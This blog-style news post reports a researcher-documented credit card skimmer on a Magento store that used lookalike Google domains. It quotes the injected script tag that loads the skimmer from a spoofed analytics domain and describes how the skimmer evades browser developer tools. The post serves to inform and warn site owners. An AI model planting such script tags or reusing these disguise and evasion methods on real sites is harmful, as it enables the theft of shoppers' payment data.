// Techno NEWS // Google Malicious Domains Used in an Attacks On Magento

in #news5 years ago

Hackers use fake Google domains convincing enough to fool website visitors into believing that infected websites are safe when they conduct online transactions.

magento-store-hack.jpg
Source

On Thursday, Sucuri researchers have published a recent case reported by a website owner under Magento.

A domain had been infected by a credit card skimmer using JavaScript code containing a link to the malicious address of the google-analytîcs[.]com website.

An example of the code used:
< script type=" text/javascript " src =" //google-analytîcs.com/www.[edited].com/3f5cf4657d5d9.js " > < /script>

"Visitors to the website can see a trustworthy name (such as Google) in queries and assume that they can be safely loaded, without noticing that the domain does not match perfectly and that it is actually malicious," say researchers about this attack process.

Card skimmer

The website owner was made aware of a problem after being blacklisted. Sucuri's investigation revealed that the data entry element of the malware module is similar to others found on other scams and uses Javascript to siphon and secretly store all input data and drop-down menu selections.

However, the code will change tactics depending on whether development tools are used in the Google Chrome or Mozilla Firefox browser.

In this case, the malicious module will not attempt to obtain information in these scenarios, which is probably an attempt to avoid detection.

According to Sucuri, the malicious module (called card skimmer) supports "dozens" of payment gateways, and if the development tools are not detected, the stolen information is sent to a remote server -- again disguised with another fraudulent domain, google[.] ssl[.]lnfo[.]cc.

Magento, WordPress and Drupal at risk

Card skimmers, installed through vulnerable e-commerce websites, are widespread. In July, RiskIQ reported that a recent spray-and-pray campaign had been successful for the Magecart hacking group, which had successfully infected more than 17,000 websites in a few months.

Magento users, like WordPress and Drupal, are encouraged to keep their software up to date.

Magento domains are a frequent target for cyber attackers seeking to collect financial data, with about 83% of Magento websites reported as vulnerable in 2018.

Stay Informed, Stay Safe

DQmdpsoEfLe5nRg4Q1oKWHNjLdMnAucCYfRou1yF5Yiwrzs.png

DQmNuF3L71zzxAyJB7Lk37yBqjBRo2uafTAudFDLzsoRV5L.gif